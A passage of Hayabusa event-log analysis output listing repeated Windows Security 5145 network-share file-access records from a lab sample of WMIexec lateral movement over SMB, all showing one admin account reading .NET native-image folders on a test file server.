+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 